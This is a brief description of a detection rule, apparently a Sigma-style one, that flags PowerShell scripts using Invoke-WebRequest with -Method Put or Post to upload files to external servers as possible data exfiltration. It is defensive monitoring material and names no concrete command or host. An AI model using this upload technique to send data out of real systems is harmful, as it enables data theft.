This rule aims to identify potentially malicious PowerShell scripts that use the `Invoke-WebRequest` cmdlet to upload files to remote servers. The presence of the `-Method Put` or `-Method Post` flags in the script signifies that data could be exfiltrated by submitting it to an external server. This detection targets scripts that leverage common web request methods typically used in data upload scenarios. The rule analyzes the `ScriptBlockText` for known cmdlets and specific flags indicative of upload activities, potentially indicating an attack vector for data leaks or breaches. By monitoring these patterns, organizations can mitigate the risk of sensitive data being exfiltrated undetected.